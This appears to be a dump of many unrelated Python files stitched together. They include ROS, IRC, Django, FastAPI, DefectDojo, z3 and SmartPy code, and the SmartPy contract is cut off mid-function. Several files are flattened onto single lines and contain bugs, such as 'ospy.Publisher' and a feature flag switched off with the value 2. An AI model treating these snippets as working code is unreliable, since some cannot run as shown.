""" Author : Varundev Suresh Babu Version: 0.1 """ import rospy from std_msgs.msg import Float64 steering_publisher = ospy.Publisher("/servo/position", Float64, queue_size = 10) throttle_publisher = rospy.Publisher("/motor/duty_cycle", Float64, queue_size = 10) def steering_callback(data): global steering steering.data = (data.data + 100.0)/200.0 def throttle_callback(data): global throttle throttle = data if __name__ == '__main__': global steering global throttle steering = Float64() throttle = Float64() rospy.init_node('basic_racecar_control_node') rospy.Subscriber("steering_control", Float64, steering_callback) rospy.Subscriber("throttle_control", Float64, throttle_callback) steering_publisher.publish(steering) throttle_publisher.publish(throttle) rospy.spin()
python
# -*- coding: utf-8 -*-
# created by inhzus
from .smms import ImageHost
from .md_parser import parse_md
python
def rawify_url(url):
    if url.startswith("https://github.com"):
        urlparts = url.replace("https://github.com", "", 1).strip('/').split('/') + [None] * 5
        ownername, reponame, _, refvalue, *filename_parts = urlparts
        filename = '/'.join([p for p in filename_parts if p is not None])
        assert ownername is not None, "URL should include the name of the owner/organization."
        assert reponame is not None, "URL should include the name of the repository."
        if refvalue is None:
            refvalue = "main"
        if filename == '':
            filename = "CITATION.cff"
        return f"https://raw.githubusercontent.com/{ownername}/{reponame}/{refvalue}/{filename}"
    # return unrecognized URLs as-is
    return url
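# A quick usage sketch for rawify_url (the URLs below are illustrative):
# GitHub URLs are rewritten to their raw.githubusercontent.com equivalents,
# missing refs and file names fall back to "main" and "CITATION.cff", and
# anything else passes through unchanged.
print(rawify_url("https://github.com/octocat/Hello-World/blob/master/README.md"))
# -> https://raw.githubusercontent.com/octocat/Hello-World/master/README.md
print(rawify_url("https://github.com/octocat/Hello-World"))
# -> https://raw.githubusercontent.com/octocat/Hello-World/main/CITATION.cff
print(rawify_url("https://example.org/paper.pdf"))
# -> https://example.org/paper.pdf  (returned as-is)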
python
"""Raw message parser implementations.""" from twisted.words.protocols.irc import ctcpExtract, parsemsg, X_DELIM from . import Message from ..hostmask import Hostmask class RawMessageParser(object): """An implementation of the parsing rules for a specific version of the IRC protocol. In most cases, you should use the `~.Connection.parser` attribute of a `.Connection` to retrieve an instance of this class. """ def __init__(self): self.functions = {} def command(self, *commands): """A decorator that registers a function as a parameter parser for messages of the types given in *commands*.""" def decorator(function): for command in commands: self.functions[command] = function return function return decorator def parse(self, connection, outgoing, raw, **kwargs): """Parse a raw IRC message string and return a corresponding `.Message` object. Any keyword arguments override field values returned by the parser.""" try: prefix, command, params = parsemsg(raw) except IndexError: parsed_kwargs = {'action': 'unknown'} else: parsed_kwargs = {'actor': Hostmask.from_string(prefix)} if command in self.functions: try: parsed_kwargs['action'] = command.lower() parsed_kwargs.update( self.functions[command](command, params)) except IndexError: del parsed_kwargs['action'] if 'action' not in parsed_kwargs: parsed_kwargs['action'] = 'unknown' parsed_kwargs['subaction'] = command splits = 2 if raw.startswith(':') else 1 params = raw.split(None, splits) if len(params) > splits: parsed_kwargs['content'] = params[splits] else: parsed_kwargs['content'] = '' parsed_kwargs.update(kwargs) return Message(connection, outgoing, raw=raw, **parsed_kwargs) #: A parser for the standard IRC version 2 protocol. IRCV2_PARSER = RawMessageParser() @IRCV2_PARSER.command('QUIT', 'NICK') def parse_undirected_message(command, params): return {'content': params[0]} @IRCV2_PARSER.command('TOPIC') def parse_directed_message(command, params): return {'venue': params[0], 'content': params[1]} @IRCV2_PARSER.command('PRIVMSG', 'NOTICE') def parse_ctcpable_directed_message(command, params): kwargs = parse_directed_message(command, params) if params[1].startswith(X_DELIM): # CTCP extended message quoting is pathologically designed, but # nobody actually sends more than one at a time. Thankfully. tag, data = ctcpExtract(params[1])['extended'][0] kwargs['content'] = data if tag.lower() == 'action': kwargs['action'] = 'action' else: kwargs['action'] = ('ctcpquery' if command == 'PRIVMSG' else 'ctcpreply') kwargs['subaction'] = tag return kwargs @IRCV2_PARSER.command('JOIN') def parse_join(command, params): return {'venue': params[0]} @IRCV2_PARSER.command('PART', 'MODE') def parse_part_mode(command, params): return {'venue': params[0], 'content': ' '.join(params[1:])} @IRCV2_PARSER.command('KICK') def parse_kick(command, params): return {'venue': params[0], 'target': params[1], 'content': params[2]}
python
#-*- coding: utf-8 -*- from bgesdk.error import APIError import pytest import six def check_result(result): assert 'result' in result assert 'count' in result assert 'next_page' in result next_page = result['next_page'] assert isinstance(result['result'], list) assert isinstance(result['count'], int) assert isinstance(next_page, int) or next_page is None class TestTaxonAbundance: @pytest.mark.parametrize('taxon_ids', [None, 'tx1', 'tx2']) def test_result(self, api, logger, self_meta_biosample_id, taxon_ids): """正常返回的数据""" ret = api.get_taxon_abundance(self_meta_biosample_id) logger.debug(ret) check_result(ret) @pytest.mark.parametrize('taxon_ids', ['txdemo', 'tx', 'test']) def test_invalid_txid(self, api, logger, self_meta_biosample_id, taxon_ids): """格式错误的 taxon 编号""" ret = api.get_taxon_abundance(self_meta_biosample_id, taxon_ids) logger.debug(ret) check_result(ret) assert ret['count'] == 0 @pytest.mark.parametrize('taxon_ids', ['txid815']) def test_valid_txid(self, api, logger, self_meta_biosample_id, taxon_ids): """在平台类群丰度 taxon_id 集合内的编号""" ret = api.get_taxon_abundance(self_meta_biosample_id, taxon_ids) logger.debug(ret) check_result(ret) assert ret['count'] == 1 @pytest.mark.parametrize('taxon_ids', ['txid1323']) def test_outter_txid(self, api, logger, self_meta_biosample_id, taxon_ids): """不在平台类群丰度 taxon_id 集合内的编号""" ret = api.get_taxon_abundance(self_meta_biosample_id, taxon_ids) logger.debug(ret) check_result(ret) assert ret['count'] == 0 class TestFuncAbundance: @pytest.mark.parametrize('catalog', ['go', 'ko', 'eggnog', 'pfam', 'kegg-pwy', 'kegg-mdl', 'level4ec', 'metacyc-rxn', 'metacyc-pwy']) def test_result(self, api, logger, self_meta_biosample_id, catalog): """正常返回的数据""" try: ret = api.get_func_abundance(self_meta_biosample_id, catalog) except APIError as error: with pytest.raises(APIError) as e: raise error e.value.code == 41202 e.value.msg == u'BGE 私有接口错误: 样品数据未入仓' return logger.debug(ret) check_result(ret) class TestGeneAbundance: def check_result(self, result): assert 'result' in result assert 'count' in result assert 'next_page' in result next_page = result['next_page'] assert isinstance(result['result'], list) assert isinstance(result['count'], int) assert next_page is None or isinstance(next_page, six.text_type) @pytest.mark.parametrize('catalog, data_type', [ ('UniRef90_HUMAnN2_0.11', 'file')]) def test_result(self, api, logger, self_meta_biosample_id, catalog, data_type): """正常返回的数据""" ret = api.get_gene_abundance(self_meta_biosample_id, catalog, data_type) logger.debug(ret) self.check_result(ret) @pytest.mark.parametrize('catalog, data_type', [ ('UniRef90_HUMAnN2_0.11', 'list')]) def test_invalid_args(self, api, self_meta_biosample_id, catalog, data_type): """正常返回的数据""" with pytest.raises(APIError) as e: api.get_gene_abundance(self_meta_biosample_id, catalog, data_type) assert e.value.code == 41001 assert e.value.msg == u'参数错误'
python
# coding=utf-8
from .email import EmailFromTemplate


def send_email(name, ctx_dict, send_to=None, subject=u'Subject', **kwargs):
    """
    Shortcut function for EmailFromTemplate class

    @return: None
    """
    eft = EmailFromTemplate(name=name)
    eft.subject = subject
    eft.context = ctx_dict
    eft.get_object()
    eft.render_message()
    eft.send_email(send_to=send_to, **kwargs)
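# A minimal usage sketch for the shortcut above. The template name, recipient
# and context are made up for illustration; any extra keyword arguments are
# forwarded to EmailFromTemplate.send_email().
send_email(
    'welcome',                      # hypothetical template name
    {'username': 'alice'},          # context rendered into the template
    send_to=['alice@example.com'],
    subject=u'Welcome!',
)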
python
import weakref import uuid from types import MethodType from collections import OrderedDict from Qt import QtGui from Qt.QtWidgets import QPushButton from Qt.QtWidgets import QGraphicsProxyWidget from Qt.QtWidgets import QMenu from PyFlow.Core.Common import * from PyFlow.UI.Utils.Settings import * from PyFlow.Core.NodeBase import NodeBase from PyFlow import getPinDefaultValueByType from PyFlow.Core.PyCodeCompiler import Py3FunctionCompiler class pythonNode(NodeBase): def __init__(self, name): super(pythonNode, self).__init__(name) self.currentComputeCode = '' @staticmethod def pinTypeHints(): return {'inputs': [], 'outputs': []} def serialize(self): default = super(pythonNode, self).serialize() default['computeCode'] = self.currentComputeCode return default def postCreate(self, jsonTemplate=None): super(pythonNode, self).postCreate(jsonTemplate) if jsonTemplate is None: return if 'computeCode' in jsonTemplate: self.currentComputeCode = jsonTemplate['computeCode'] compute = Py3FunctionCompiler( 'compute').compile(self.currentComputeCode) self.compute = MethodType(compute, self) # recreate pins for i in jsonTemplate['inputs']: inPin = self.createInputPin(i['name'], i['dataType'], getPinDefaultValueByType(i['dataType'])) inPin.setData(i['value']) inPin.dirty = i['bDirty'] for o in jsonTemplate['outputs']: compute = self.compute if o['dataType'] in ('AnyPin', 'ExecPin') else None outPin = self.createOutputPin(o['name'], o['dataType'], getPinDefaultValueByType(o['dataType']), compute) self.autoAffectPins() @staticmethod def category(): return 'Common' @staticmethod def keywords(): return ['Code', 'Expression', 'py'] @staticmethod def description(): return 'Python script node'
python
import logging from rest_framework import exceptions from django.core.exceptions import ObjectDoesNotExist from django.contrib.auth.models import AnonymousUser from django.contrib.auth import get_user_model from galaxy.api import serializers from galaxy.api.views import base_views from galaxy.main import models __all__ = [ 'UserList', 'UserDetail', 'ActiveUserView', 'UserNotificationSecretList', 'UserRepositoriesList', 'UserRolesList', 'UserStarredList', 'UserSubscriptionList', ] logger = logging.getLogger(__name__) User = get_user_model() class UserDetail(base_views.RetrieveUpdateAPIView): model = User serializer_class = serializers.UserSerializer def get_object(self, qs=None): obj = super(UserDetail, self).get_object() if not obj.is_active: raise exceptions.PermissionDenied() return obj class UserList(base_views.ListAPIView): model = User serializer_class = serializers.UserSerializer def get_queryset(self): qs = super(UserList, self).get_queryset() return qs.filter(is_active=True) class ActiveUserView(base_views.RetrieveAPIView): model = User serializer_class = serializers.ActiveUserSerializer view_name = 'Me' def get_object(self): try: obj = self.model.objects.get(pk=self.request.user.pk) except ObjectDoesNotExist: obj = AnonymousUser() return obj class UserRepositoriesList(base_views.SubListAPIView): model = models.Repository serializer_class = serializers.RepositorySerializer parent_model = User relationship = 'repositories' class UserRolesList(base_views.SubListAPIView): model = models.Content serializer_class = serializers.RoleDetailSerializer parent_model = User relationship = 'roles' def get_queryset(self): qs = super(UserRolesList, self).get_queryset() return qs.filter(active=True, is_valid=True) class UserSubscriptionList(base_views.SubListAPIView): model = models.Subscription serializer_class = serializers.SubscriptionSerializer parent_model = User relationship = 'subscriptions' class UserStarredList(base_views.SubListAPIView): model = models.Stargazer serializer_class = serializers.StargazerSerializer parent_model = User relationship = 'starred' class UserNotificationSecretList(base_views.SubListAPIView): model = models.NotificationSecret serializer_class = serializers.NotificationSecretSerializer parent_model = User relationship = 'notification_secrets'
python
import re import pandas as pd from dojo.models import Finding __author__ = 'Matt Sicker' class DsopParser: def __init__(self, file, test): self._test = test self._items = [] f = pd.ExcelFile(file) self.__parse_disa(pd.read_excel(f, sheet_name='OpenSCAP - DISA Compliance', parse_dates=['scanned_date'], dtype={'result': 'category', 'severity': 'category'})) self.__parse_oval(pd.read_excel(f, sheet_name='OpenSCAP - OVAL Results')) self.__parse_twistlock( pd.read_excel(f, sheet_name='Twistlock Vulnerability Results', dtype={'severity': 'category'})) self.__parse_anchore(pd.read_excel(f, sheet_name='Anchore CVE Results', dtype={'severity': 'category'})) self.__parse_anchore_compliance( pd.read_excel(f, sheet_name='Anchore Compliance Results', dtype={'severity': 'category'})) def __parse_disa(self, df: pd.DataFrame): for row in df.itertuples(index=False): if row.result not in ('fail', 'notchecked'): continue title = row.title unique_id = row.ruleid if row.severity == 'unknown': severity = 'Info' else: severity = row.severity.title() cve = row.identifiers references = row.refs description = row.desc impact = row.rationale date = row.scanned_date.date() tags = "disa" finding = Finding(title=title, date=date, cve=cve, severity=severity, description=description, impact=impact, references=references, test=self._test, unique_id_from_tool=unique_id, static_finding=True, dynamic_finding=False) finding.unsaved_tags = tags self._items.append(finding) def __parse_oval(self, df: pd.DataFrame): severity_pattern = re.compile(r'\((.*)\)') for row in df.itertuples(index=False): if not row.result or row.result in ('false'): continue title = row.title match = severity_pattern.search(title) if match: sev = match.group(1) if sev == 'Important': severity = 'High' elif sev == 'Moderate': severity = 'Medium' elif sev == 'None': severity = 'Info' else: severity = sev else: severity = 'Info' unique_id = row.id cve = row.ref tags = "oval" finding = Finding(title=title, cve=cve, severity=severity, unique_id_from_tool=unique_id, test=self._test, static_finding=True, dynamic_finding=False) finding.unsaved_tags = tags self._items.append(finding) def __parse_twistlock(self, df: pd.DataFrame): for row in df.itertuples(index=False): cve = row.id description = row.desc mitigation = row.status url = row.link component_name = row.packageName component_version = row.packageVersion title = '{}: {} - {}'.format(cve, component_name, component_version) if row.severity == 'important': severity = 'High' elif row.severity == 'moderate': severity = 'Medium' else: severity = row.severity.title() severity_justification = row.vecStr tags = "twistlock" finding = Finding(title=title, cve=cve, url=url, severity=severity, description=description, component_name=component_name, component_version=component_version, severity_justification=severity_justification, test=self._test, static_finding=True, dynamic_finding=False) finding.unsaved_tags = tags self._items.append(finding) def __parse_anchore(self, df: pd.DataFrame): for row in df.itertuples(index=False): cve = row.cve severity = row.severity component = row.package file_path = row.package_path mitigation = row.fix description = "Image affected: {}".format(row.tag) title = '{}: {}'.format(cve, component) tags = "anchore" finding = Finding(title=title, cve=cve, severity=severity, mitigation=mitigation, component_name=component, description=description, test=self._test, static_finding=True, dynamic_finding=False, file_path=file_path) finding.unsaved_tags = tags self._items.append(finding) def 
__parse_anchore_compliance(self, df: pd.DataFrame): for row in df.itertuples(index=False): if row.policy_id != "DoDFileChecks": continue if row.gate_action == "warn": severity = "Medium" elif row.gate_action == "stop": severity = "Critical" else: severity = "Info" severity = severity mitigation = "To be investigated" description = "Gate: {} (Trigger: {}): {}".format(row.gate, row.trigger, row.check_output) title = '{}: {}'.format(row.policy_id, row.trigger_id) tags = "anchore_compliance" finding = Finding(title=title, severity=severity, mitigation=mitigation, description=description, test=self._test, static_finding=True, dynamic_finding=False) finding.unsaved_tags = tags self._items.append(finding) @property def items(self): return self._items
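# A minimal usage sketch for the parser above. The workbook name is a
# placeholder and `test` stands in for an existing DefectDojo Test instance;
# the parser reads the expected worksheets from the Excel file and exposes the
# resulting Finding objects through the .items property.
test = None  # placeholder; in DefectDojo this would be an existing Test object
with open('dsop_scan_results.xlsx', 'rb') as report:   # hypothetical file name
    findings = DsopParser(report, test).items
for finding in findings:
    print(finding.title, finding.severity)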
python
from exterminate.Utilities import builtins
from exterminate.Gizoogle import translate

_print = builtins.print

# Monkey-patch the built-in print so every positional argument is joined,
# run through the Gizoogle translator, and then printed normally.
builtins.print = lambda *args, **kwargs: _print(
    translate(' '.join([str(x) for x in args])), **kwargs
)
python
from builtins import object
import abc

from future.utils import with_metaclass


class Solver(with_metaclass(abc.ABCMeta, object)):

    def __init__(self, **kwargs):
        self.options = kwargs
        if 'verbose' not in self.options:
            self.options['verbose'] = False

    @abc.abstractmethod
    def solve(self, p):
        """Solve QP problem
        """
        pass
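# A minimal sketch of a concrete subclass, only to illustrate how the abstract
# base is meant to be used: subclasses pick up the options handling from
# __init__ and must implement solve(). The DummySolver name and the placeholder
# problem argument are assumptions for illustration.
class DummySolver(Solver):
    def solve(self, p):
        if self.options['verbose']:
            print('solving', p)
        return None


solver = DummySolver(verbose=True)
solver.solve('qp-problem-placeholder')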
python
# Copyright (c) 2015 Microsoft Corporation

from z3 import *

set_option(auto_config=True)

x = Int('x')
y = Int('y')
f = Function('f', IntSort(), IntSort())
solve(f(f(x)) == x, f(x) == y, x != y)
python
"""Capture synthesizer audio for each of a batch of random chords. By default, prints the number of JACK xruns (buffer overruns or underruns) produced during the MIDI playback and capture process. """ import cProfile import datetime import json import os import pstats import time import numpy as np import scipy.io.wavfile import muser.audio as audio import muser.live as live import muser.sequencer as sequencer import muser.utils as utils rnd = np.random.RandomState() date = datetime.datetime.now().strftime("%y%m%d-%Hh%M") ## Output configuration out_dir = '/tmp/muser/chord_batches' # save each chord's captured audio data to a .wav file wav_out = False # profile the audio capture operation profile_capture = False ## Chord generation and capture parameters batches = 10 batch_size = 32 chord_size = 1 #lambda: rnd.randint(1, 4) # function to generate random velocity vectors chord_gen = sequencer.random_velocity_vector # scalar or range of velocity velocity = (30, 128) # duration of silence captured efore sending chord's events init_silence = 0.1 # duration of capture, before and after chord release chord_time = 2.0 release_time = 0.0 ## Synthesizer parameters pianoteq_stereo = dict( name='Pianoteq55', midi_inports=['Pianoteq55:midi_in'], outports=['Pianoteq55:out_1', 'Pianoteq55:out_2'], reset=(0xB0, 0, 0), ) ## File name and path formats out_subdir = os.path.join(out_dir, date) os.makedirs(out_subdir, exist_ok=True) names = dict( pickle='batch{}.pickle', wav='batch{}-chord{}.wav', start_log='params.json', end_log='end_log', capture_profile='capture_events-batch{}_chord{}-profile', ) paths = {k: os.path.join(out_subdir, name) for k, name in names.items()} ## Data structure for chord batches chord_dtype = np.dtype([('velocity_vector', np.float32, sequencer.N_PITCHES), ('captured_buffers', object)]) batch = np.ndarray([batch_size], dtype=chord_dtype) ## JACK client initialization client = live.SynthInterfaceClient(synth_config=pianoteq_stereo) blocksize, samplerate = client.blocksize, client.samplerate ## Write to parameter log---for file monitors # TODO: update utils.FileMonitor to use JSON logs with open(paths['start_log'], 'w') as start_log: params = {'paths': paths, 'samplerate': samplerate, 'blocksize': blocksize, 'batches': batches, 'batch_size': batch_size, 'times': [init_silence, chord_time, release_time]} start_log.write(json.dumps(params)) with client: client.connect_synth() start_clock = time.perf_counter() for i_batch in range(batches): # generate batch of random chords (velocity vectors) batch['velocity_vector'] = [chord_gen(chord_size, velocity=velocity) for _ in range(batch_size)] for i_chord, chord in enumerate(batch): init_pause = {'events': None, 'duration': init_silence} # prepare the chord's MIDI events velocity_vector = chord['velocity_vector'] notes_on = sequencer.vector_to_midi_events('ON', velocity_vector) on_events = {'events': notes_on, 'duration': chord_time} notes_off = sequencer.vector_to_midi_events('OFF', velocity_vector) off_events = {'events': notes_off, 'duration': release_time} # collate event groups for client.capture_events event_groups = [init_pause, on_events, off_events] # send the event groups to the client for capture if profile_capture: name_i = paths['capture_profile'].format(i_batch, i_chord) cProfile.run('client.capture_events(event_groups)', name_i) else: client.capture_events(event_groups) # retrieve the captured audio for the chord chord['captured_buffers'] = client.drop_captured() # save the chord audio data to a .wav file if wav_out: snd = 
audio.buffers_to_snd(chord['captured_buffers']) wav_path = paths['wav'].format(i_batch, i_chord) scipy.io.wavfile.write(wav_path, samplerate, snd) batch.dump(paths['pickle'].format(i_batch)) ## print profile of the capture operation # TODO: statistics across chord profiles if profile_capture: # (currently prints profile for first captured chord only) name = paths['capture_profile'].format(0, 0) profile = pstats.Stats(name).strip_dirs() profile.sort_stats('time').print_stats(10) ## generate and write post-capture log log_str = "Captured {} batches of {} chords, at [s]:\n".format(batches, batch_size) log_str += utils.logs_entryexit(client.capture_log, output_labels={None: 'Xrun'}, ref_clock=start_clock, header=('Start', 'End')) xrun_print_end = ', at:' if client.n_xruns else '.' log_str += "\n\n{} total Xruns{}\n".format(client.n_xruns, xrun_print_end) for xrun in client.xruns - start_clock: log_str += '{:10.4f} s\n'.format(xrun[0]) print('\n' + log_str) with open(paths['end_log'], 'w') as end_log: end_log.write(log_str)
python
# swap 4 variables
w = int(input("enter any number: "))
x = int(input("enter any number: "))
y = int(input("enter any number: "))
z = int(input("enter any number: "))

print("w before swap: {}".format(w))
print("x before swap: {}".format(x))
print("y before swap: {}".format(y))
print("z before swap: {}".format(z))

w = w + x + y + z
x = w - x - y - z
print("x after swap is {}".format(x))
y = w - x - y - z
print("y after swap is {}".format(y))
z = w - x - y - z
print("z after swap is {}".format(z))
w = w - x - y - z
print("w after swap is {}".format(w))
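# A worked example of the arithmetic swap above, with fixed values instead of
# user input: starting from w, x, y, z = 1, 2, 3, 4 the sums and differences
# rotate the values, so x ends up with w's old value, y with x's, z with y's,
# and w with z's.
w, x, y, z = 1, 2, 3, 4
w = w + x + y + z   # w now holds the total, 10
x = w - x - y - z   # 10 - 2 - 3 - 4 = 1  (old w)
y = w - x - y - z   # 10 - 1 - 3 - 4 = 2  (old x)
z = w - x - y - z   # 10 - 1 - 2 - 4 = 3  (old y)
w = w - x - y - z   # 10 - 1 - 2 - 3 = 4  (old z)
assert (w, x, y, z) == (4, 1, 2, 3)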
python
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals

from django.http import HttpResponse
from django.template import Template, RequestContext
from django.shortcuts import render

from metahumans import models


# Create your views here.
def all_heroes(request):
    return render(request, 'metahumans/list_heroes.html', {
        'heroes': models.SuperHero.objects.select_related('team').all(),
        'title': 'Listado de superhéroes',
    })


def list_levels(request):
    return render(request, 'metahumans/levels.html', {
        'heroes': models.SuperHero.objects.only('name', 'level').all().order_by('-level'),
        'title': 'Listado de superhéroes por niveles',
    })


def hero_details(request, slug):
    sh = models.SuperHero.objects.get(slug=slug)
    return render(request, 'metahumans/hero_details.html', {
        'superhero': sh,
        'title': sh.name,
    })
python
import UpdateItem as ui
import UpdateChecker as uc
import UpdateFileReader as ufr

import tkinter
from tkinter import messagebox

is_verbose = True

root = tkinter.Tk()
root.withdraw()

userfile = "updateList.txt"
currentReader = ufr.UpdateFileReader(userfile, is_verbose)

while currentReader.getNextItem():
    currentItem = currentReader.getCurrentItemData()
    if currentItem:
        currentSoftware = uc.UpdateChecker(currentItem, is_verbose)
        if currentSoftware.status:
            currentVersion = currentSoftware.getCurrentVersion()
            if currentVersion.new_version:
                msg_result = messagebox.askyesno(
                    "Update available for " + currentVersion.name,
                    "Version " + currentVersion.version_info + " available for "
                    + currentVersion.name + " (current: "
                    + currentVersion.installed_version + ") Have you updated yet?")
                if msg_result:
                    currentItem.installed_version = currentVersion.version_info
                    currentReader.updateCurrentItemData(currentItem)
python
# Modified: 2022-06-02 # Description: Defines the FastAPI app # from pathlib import Path from motor.motor_asyncio import AsyncIOMotorClient from fastapi import FastAPI from fastapi.middleware.cors import CORSMiddleware from fastapi.staticfiles import StaticFiles from controllers import game_controller, player_controller from db import db from config import settings # create the app app = FastAPI() # attach CORS middleware; current settings are only appropriate for development environments origins = [ "http://localhost", ] app.add_middleware( CORSMiddleware, allow_origins=origins, allow_credentials=True, allow_methods=["*"], allow_headers=["*"], ) class ReactStaticFiles(StaticFiles): """Extends StaticFiles to allow React SPA to handle 404s""" async def get_response(self, path, scope): res = await super().get_response(path, scope) if res.status_code == 404: # funnel 404s back to React App: source https://stackoverflow.com/a/68363904 res = await super().get_response('.', scope) return res # attach API endpoints app.include_router(game_controller.router, tags=["game"], prefix="/api/game") app.include_router(player_controller.router, tags=["player"], prefix="/api/player") if settings.STATIC_CONTENT_SRV and Path(settings.STATIC_CONTENT_DIR).is_dir(): app.mount("/", ReactStaticFiles(directory=settings.STATIC_CONTENT_DIR, html=True), name="static") # open an asynchronous database connection on startup @app.on_event("startup") async def open_mongodb_connection(): print("Connecting to MongoDB client...") db.client = AsyncIOMotorClient(settings.MONGODB_URI) await db.index() # index the db for faster lookups and to enforce uniqueness print("Connection successful" if db.client else "Connection failed") # close the asynchronous database connection on shutdown @app.on_event("shutdown") async def close_mongodb_connection(): print("Closing connection to MongoDB client...") db.client.close()
python
'''
Modified run-length encoding.
Modify the result of problem P10 in such a way that if an element has no
duplicates it is simply copied into the result list. Only elements with
duplicates are transferred as (N E) lists.
Example:
* (encode-modified '(a a a a b c c a a d e e e e))
((4 A) B (2 C) (2 A) D (4 E))
'''

# read all list elements on one line, separated by spaces
demo_list = input("Enter elements sep by space: ").split(' ')

runLength_converted_list = list()   # runs of equal elements, as sublists
encoded_list = list()               # final encoded output

previous_item = demo_list[0]        # element most recently added to the current run
temp_list = list()                  # current run of equal elements

for current_item in demo_list:
    if current_item == previous_item:
        # same as the previous element: extend the current run
        temp_list.append(current_item)
    else:
        # run ended: store a copy of it and start a new run with current_item
        runLength_converted_list.append(temp_list[:])
        temp_list.clear()
        temp_list.append(current_item)
        previous_item = current_item
else:
    # store the final run once the loop finishes
    runLength_converted_list.append(temp_list[:])

for item in runLength_converted_list:
    # singletons are copied as-is, longer runs become [count, element]
    count_sublist_items = len(item)
    if count_sublist_items == 1:
        encoded_list.append(item[0])
    else:
        encoded_list.append([count_sublist_items, item[0]])

# print the original list and its encoded form
print(f"old list: {demo_list}")
print(f"encoded list: {encoded_list}")
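# For the example from the docstring above, entering
#   a a a a b c c a a d e e e e
# at the prompt produces:
#   old list: ['a', 'a', 'a', 'a', 'b', 'c', 'c', 'a', 'a', 'd', 'e', 'e', 'e', 'e']
#   encoded list: [[4, 'a'], 'b', [2, 'c'], [2, 'a'], 'd', [4, 'e']]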
python
import dash_html_components as html


class Component:
    def render(self) -> html.Div:
        raise NotImplementedError
python
# The MIT License (MIT) # # Copyright (c) 2014 Steve Milner # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to # deal in the Software without restriction, including without limitation the # rights to use, copy, modify, merge, publish, distribute, sublicense, and/or # sell copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. """ SQLAlchemy backend. """ from sqlalchemy import ( Column, Integer, SmallInteger, String, ForeignKey, create_engine) from sqlalchemy.orm import relationship, sessionmaker from sqlalchemy.ext.declarative import declarative_base from flagon import errors from flagon.backends import Backend Base = declarative_base() class Feature(Base): __tablename__ = 'features' name = Column(String, primary_key=True) active = Column(SmallInteger) strategy = Column(String) params = relationship('Param', backref='feature') class Param(Base): __tablename__ = 'params' id = Column(Integer, primary_key=True) name = Column(String) value = Column(String) feature_id = Column(Integer, ForeignKey('features.name')) class SQLAlchemyBackend(Backend): def __init__(self, connection_str): """ :param connection_str: information can be found at http://docs.sqlalchemy.org/en/rel_0_9/core/engines.html Example: sqlite:///test.db :type connection_str: str :rtpe: SQLAlchemyBackend """ self._engine = create_engine(connection_str, echo=False) Base.metadata.create_all(self._engine) self._session = sessionmaker(bind=self._engine).__call__() def exists(self, name): """ Checks if a feature exists. :param name: name of the feature. :rtype: bool """ return bool(self._session.query(Feature).filter_by(name=name).count()) def is_active(self, name): """ Checks if a feature is on. :param name: name of the feature. :rtype: bool :raises: UnknownFeatureError """ if not self.exists(name): raise errors.UnknownFeatureError('Unknown feature: %s' % name) feature = self._session.query(Feature).filter_by(name=name).first() return bool(feature.active) def _turn(self, name, value): """ Turns a feature on. :param name: name of the feature. :param value: 0 or 1 :raises: UnknownFeatureError """ if not self.exists(name): raise errors.UnknownFeatureError('Unknown feature: %s' % name) self._session.merge(Feature(name=name, active=value)) self._session.commit() turn_on = lambda s, name: s._turn(name, 1) turn_off = lambda s, name: s._turn(name, 2)
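# A small usage sketch for the backend above, using an in-memory SQLite
# database. exists() only reports features already stored in the table, and
# is_active() (like the turn_on/turn_off helpers) raises UnknownFeatureError
# for features that have never been stored; the feature name is illustrative.
backend = SQLAlchemyBackend('sqlite:///:memory:')
print(backend.exists('new-ui'))        # False: nothing has been stored yet
try:
    backend.is_active('new-ui')
except errors.UnknownFeatureError as exc:
    print(exc)                         # Unknown feature: new-ui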
python
import smartpy as sp FA12 = sp.io.import_script_from_url("file:Fa12.py", name="FA12") """ Possible states of the swap """ class State(): Waiting = 1 Initiated = 2 """ Swap record - hashedSecret(bytes): current swap hash initiator(address): initiators tezos address initiator_eth_addr(string): initiators ethereum address participant(address): counter-party/participant's tezos address refundTimestamp(timestamp): unix time(sec) after which the swap expires value(nat): value of the swap in fa1.2 tokens state(State): current state of swap """ Swap = sp.TRecord(hashedSecret=sp.TBytes, initiator_eth_addr=sp.TString, initiator=sp.TAddress, participant=sp.TAddress, refundTimestamp=sp.TTimestamp, value=sp.TNat, state=sp.TInt) """ Contract Storage - admin(address): tezos address of the admin reward(nat): reward in basis points for swap response fa12(address): fa1.2 contract address active(bool): contract state [true:active, false:inactive] swaps(big_map(bytes,Swap)): map of hashed secrets and swap details """ class TokenSwap(sp.Contract): def __init__(self, _admin, _fa12): self.init(admin=_admin, reward=sp.as_nat(15), fa12=_fa12, active=sp.bool(False), swaps=sp.big_map(tkey=sp.TBytes, tvalue=Swap)) """ ensures only admin can call a function """ def onlyByAdmin(self): sp.verify(sp.sender == self.data.admin) """ ensures only initiator of the swap can call a function args: _hashedSecret: hashed secret of the swap """ def onlyByInitiator(self, _hashedSecret): sp.verify(sp.sender == self.data.swaps[_hashedSecret].initiator) """ checks if the contract is active """ def contractIsActive(self): sp.verify(self.data.active == sp.bool(True)) """ checks whether a swap can be initiated args: _hashedSecret: hashed secret of the swap _refundTimestamp: unix time(sec) after which the swap expires """ def isInitiable(self, _hashedSecret, _refundTimestamp): sp.verify(~self.data.swaps.contains(_hashedSecret)) sp.verify(sp.now < _refundTimestamp) """ ensures the currest swap state matches the required `state` args: _hashedSecret: hashed secret of the swap _state: state the current swap is expected to be in """ def checkState(self, _hashedSecret, _state): sp.verify(self.data.swaps[_hashedSecret].state == _state) """ checks whether the swap can be redeemed args: _hashedSecret: hashed secret of the swap _secret: secret for the swap which produced the corresponding hashedSecret """ def isRedeemable(self, _hashedSecret, _secret): 